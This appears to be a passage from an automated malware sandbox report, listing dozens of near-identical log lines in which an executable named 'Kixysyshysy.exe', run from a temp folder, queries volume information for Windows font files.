Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
